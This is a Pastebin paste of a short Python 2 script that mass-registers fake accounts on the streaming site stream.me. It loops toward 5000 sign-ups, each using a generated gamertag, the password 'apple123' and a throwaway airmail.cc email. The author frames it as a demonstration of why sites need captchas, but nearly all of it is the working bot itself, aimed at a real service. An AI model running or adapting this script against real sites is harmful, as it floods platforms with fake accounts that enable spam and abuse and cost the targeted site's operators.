Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import requests
- URL = "https://www.stream.me/register"
- print '-----------------------------------------------------------------------------------------------'
- print 'This is why you need captchas. - Originally pasted on April 1rst, 2015. Made April 1rst, 2015. '
- print '-----------------------------------------------------------------------------------------------'
- #This is seriously nothing special. More so just a way to show new websites that it doesn't take
- #300 lines of code to abuse their lack of verification.
- #Carter Smith, 2015.
- global count
- count = 0
- global total
- total = 5000 # total accounts to make
- while count < total:
- httpResponse = requests.get("http://www.gamertagcreator.com/ajax-suggestion-refresh.php")
- userName = httpResponse.text.split()[0].split()[0].lower()
- if "+" in userName:
- userName = "%s" % (userName.split('+')[0])
- PARAMS= {
- 'username': userName + 'RootAccount',
- 'password': 'apple123',
- 'email': userName + '@airmail.cc',
- 'month': '.0.7.0.1.0.$February',
- 'day': '.0.7.0.1.1.$2',
- 'year': '.0.7.0.1.2.$1990',
- 'gender': 'M', #Was looking for a numerical value for a solid 5 minutes. zz
- 'post': 'Submit',
- }
- print userName + 'RootAccount'
- requests.post(URL, data=PARAMS)
- count += 1
- print 'Accounts made.'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement